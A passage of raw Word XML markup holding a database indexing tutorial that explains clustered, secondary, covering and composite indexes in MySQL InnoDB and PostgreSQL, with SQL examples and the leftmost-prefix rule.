    <w:p w14:paraId="46CCDC1D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Clustered index on primary key (id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2522F2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="77BA72A8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Leaf pages of the index ARE the data pages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CD8194" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Page 0: [id=1, name="Alice", ...] [id=2, name="Bob", ...] [id=3, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F0EFFE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Page 1: [id=4, ...] [id=5, ...] [id=6, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A33CC53" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703258F4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="568B6972" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Data is physically sorted by id.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D592E54" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In MySQL (InnoDB):</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Every table HAS a clustered index (the primary key). If no PK is defined, InnoDB uses a hidden row ID. The table data lives in the leaves of the primary key B-Tree.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21532648" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In PostgreSQL:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Tables are heap-organized by default (no clustered index). You can CLUSTER a table by an index (one-time physical reordering), but it doesn't maintain order on future inserts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF062DD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0D6F6E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1461"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Range scans on the clustering key are extremely fast (sequential I/O — data is physically adjacent).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5078C32D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1461"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>No separate "row lookup" needed (the leaf IS the row).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E4649F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF50859" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1462"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Inserts into the middle of the key range are expensive (must shift data or split pages).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724DF6FA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1462"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Only one clustering order per table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3408BAF3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1462"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:t>Secondary indexes must store the clustering key (not a direct row pointer) — adding indirection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF8C5EE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Non-Clustered Index (Secondary Index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCE2A81" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> A separate structure that stores (index_key → row_pointer). The table data is stored independently (heap or clustered by a different key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41780C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA72E63" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Secondary index on email:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AB777C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="5A13C2FC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Index leaf: [email="alice@ex.com", row_ptr=(page 47, slot 3)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432C2FF6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">            [email="bob@ex.com", row_ptr=(page 12, slot 7)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1138D839" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">            [email="charlie@ex.com", row_ptr=(page 89, slot 1)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCBACBE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="3CAECB0B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>To fetch the full row: follow row_ptr → random I/O to heap page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B02C8E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In InnoDB (MySQL):</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Secondary index leaf stores the PRIMARY KEY value (not a physical row pointer). To fetch the row, you then look up the primary key in the clustered index. This is called a "bookmark lookup" or "double lookup."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AA08F8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B26F393" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query: SELECT * FROM users WHERE email = 'alice@example.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305B344E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Step 1: Search email index → find PK = 42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F26F60" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Step 2: Search clustered index (PK) for id=42 → find full row</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A783F4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Two B-Tree traversals!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257DE575" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Covering Index (Index-Only Scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D88DB9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> An index that contains ALL columns needed to satisfy a query — no need to visit the table at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C1D257" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAF2F2B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Query: SELECT email, name FROM users WHERE email = 'alice@example.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B15D1D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="134DE8DF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Regular index on (email):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEB637E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Find entry in index → get row pointer → fetch row from heap → extract email, name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1754A042" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Requires heap access (random I/O)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2494C265" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="79F25BED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Covering index on (email, name):     -- or: CREATE INDEX idx ON users(email) INCLUDE(name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BD9EFD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → Find entry in index → index leaf already has email AND name → return immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42892E8B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  → No heap access needed! (index-only scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CB7426" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Why this matters for performance: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553"/>
        <w:gridCol w:w="4933"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="62517C1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338DA0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Approach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CD1955" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A12791">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>I/O Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="06FE155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1155C4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>No index (heap scan)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1425E2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Read entire table sequentially</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="33A93B2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84591B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Non-covering index</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5B3FBE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Index traversal + random I/O per row to heap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A12791" w:rsidRPr="00A12791" w14:paraId="35E12F5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5047C5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Covering index</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DE5EA1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
            <w:r w:rsidRPr="00A12791">
              <w:t>Index traversal only (no heap access)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1AE0EE53" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The random I/O to the heap is often the most expensive part. Covering indexes eliminate it entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4223ACF6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The tradeoff:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> Wider indexes consume more storage, more memory, and slower writes (more data to maintain per index entry).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAF25CB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 Composite (Multi-Column) Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7349C113" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> An index on multiple columns, sorted by the first column, then second within ties, then third, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F80D821" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF06F49" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>CREATE INDEX idx_composite ON orders(customer_id, order_date, status);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEA22C0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="27441AC9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index is sorted: first by customer_id, then by order_date, then by status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC44E62" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="57FFFCBD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Leaf entries (conceptual):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128FB14F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  (cust=1, date=2024-01-01, status='completed') → row_ptr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D91E497" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  (cust=1, date=2024-01-15, status='pending')   → row_ptr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FB33DF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  (cust=1, date=2024-02-01, status='completed') → row_ptr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5001C2A2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  (cust=2, date=2024-01-05, status='shipped')   → row_ptr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E94ABC6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  (cust=2, date=2024-01-10, status='completed') → row_ptr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588EAC7C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747BFE11" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The "leftmost prefix" rule:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CEB707" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>This composite index supports these queries efficiently:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C507444" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75891DAE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>✓ WHERE customer_id = 1                          (uses first column)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28449945" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>✓ WHERE customer_id = 1 AND order_date &gt; '2024-01-01'  (uses first + second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB8A5AF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>✓ WHERE customer_id = 1 AND order_date = '2024-01-15' AND status = 'pending'  (all three)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B91E90" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve"> WHERE order_date &gt; '2024-01-01'               (second column alone — can't use index efficiently)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D65B0D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve"> WHERE status = 'pending'                       (third column alone — can't use index)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6FA1F1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve"> WHERE customer_id = 1 AND status = 'pending'  (skips second column — partial use only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A4786F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Column order in composite indexes matters enormously:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAD367B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0FE5B3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Index on (A, B, C):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEBD5C7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  ✓ A              ✓ A, B         ✓ A, B, C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6574ED49" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve"> B              </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve"> B, C         </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✗</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve"> C, A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BFF9FC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE62B09" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
